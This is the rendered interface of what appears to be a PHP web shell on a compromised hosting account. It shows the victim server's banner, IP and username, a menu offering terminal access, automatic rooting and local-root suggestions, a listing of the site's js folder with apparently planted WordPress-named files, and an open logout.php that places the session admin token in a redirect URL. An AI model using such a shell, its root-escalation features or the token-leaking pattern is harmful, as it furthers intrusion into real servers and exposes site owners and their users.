Linux moon.hostseba.com 4.18.0-553.51.1.lve.el8.x86_64 #1 SMP Tue May 6 15:14:12 UTC 2025 x86_64
LiteSpeed
Server IP : 103.174.152.68 & Your IP : 216.73.216.150
Domains :
Cant Read [ /etc/named.conf ]
User : julaysp1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
julaysp1 /
public_html /
js /
Delete
Unzip
Name
Size
Permission
Date
Action
bootstrap-datepicker
[ DIR ]
drwxr-xr-x
2025-09-12 20:29
dashboard
[ DIR ]
drwxr-xr-x
2025-09-12 18:38
datatables.net-bs4
[ DIR ]
drwxr-xr-x
2025-09-12 18:46
fonts
[ DIR ]
drwxr-xr-x
2025-09-12 09:22
progressbar.js
[ DIR ]
drwxr-xr-x
2025-09-12 16:58
wp
[ DIR ]
drwxr-xr-x
2025-09-12 21:02
.htaccess
237
B
-rw-r--r--
2025-09-01 07:26
Bangla.ttf
137.05
KB
-rw-r--r--
2023-12-20 13:06
auto_tin.txt
2
B
-rw-r--r--
2025-08-20 19:12
bio.php
10.72
KB
-rw-r--r--
2024-11-20 16:13
bio_complete.php
0
B
-rw-r--r--
2025-09-12 16:39
birthKey.txt
24
B
-rw-r--r--
2025-05-21 11:30
cambria-math.woff
729.15
KB
-rw-r--r--
2025-05-27 07:33
cardTokenName.txt
8
B
-rw-r--r--
2025-05-29 16:31
card_make.txt
1
B
-rw-r--r--
2025-08-20 19:12
chart-20250912201014.js
7.95
KB
-rw-r--r--
2024-10-25 15:16
chart.js
7.95
KB
-rw-r--r--
2024-10-25 15:16
createLink.php
4.61
KB
-rw-r--r--
2024-11-14 09:25
fetch_balance.php
650
B
-rw-r--r--
2024-10-25 15:16
fontawesome-webfont.woff
79.38
KB
-rw-r--r--
2023-12-20 13:06
fontawesome-webfont.woff2
64
KB
-rw-r--r--
2025-09-12 19:16
footer.php
2.17
KB
-rw-r--r--
2024-11-15 15:08
hoverable-collapse-20250912200825.js
806
B
-rw-r--r--
2024-10-25 15:16
hoverable-collapse.js
806
B
-rw-r--r--
2024-10-25 15:16
htaccess.txt
120
B
-rw-r--r--
2025-08-21 08:56
img_68a6c2f561d77.
1.69
KB
-rw-r--r--
2025-08-21 06:55
index.php
7.03
KB
-rw-r--r--
2025-09-10 08:54
logout.php
313
B
-rw-r--r--
2024-11-13 15:50
nid_pending.php
14.65
KB
-rw-r--r--
2024-11-20 16:25
on_off_test-20250912200834.php
14.85
KB
-rw-r--r--
2024-11-17 06:25
on_off_test-20250912200914.php
14.85
KB
-rw-r--r--
2024-11-17 06:25
select.dataTables.min.css
3.83
KB
-rw-r--r--
2024-10-25 15:16
server-copys.php
0
B
-rw-r--r--
2025-09-12 20:57
settings-20250912200846.js
3.79
KB
-rw-r--r--
2024-10-25 15:16
settings.js
3.79
KB
-rw-r--r--
2024-10-25 15:16
smartPdfLoad-20250912181917.txt
2
B
-rw-r--r--
2025-08-20 19:12
smartTokenName.txt
8
B
-rw-r--r--
2025-05-29 16:31
template.js
4.45
KB
-rw-r--r--
2024-10-25 15:16
typeahead.js
1.88
KB
-rw-r--r--
2024-10-25 15:16
wp-blog-header.php
2.73
KB
-rw-r--r--
2025-09-01 07:25
wp-cron.php
2.73
KB
-rw-r--r--
2025-09-01 07:25
Save
Rename
<?php // Start session session_start(); $token = "admin_token=".$_SESSION['admin_token']; // Destroy all session variables unset($_SESSION['admin_token']); unset($_SESSION['admin_id']); // Redirect to login page (you can modify this to the correct login page path) header("Location: index.php?$token"); exit; ?>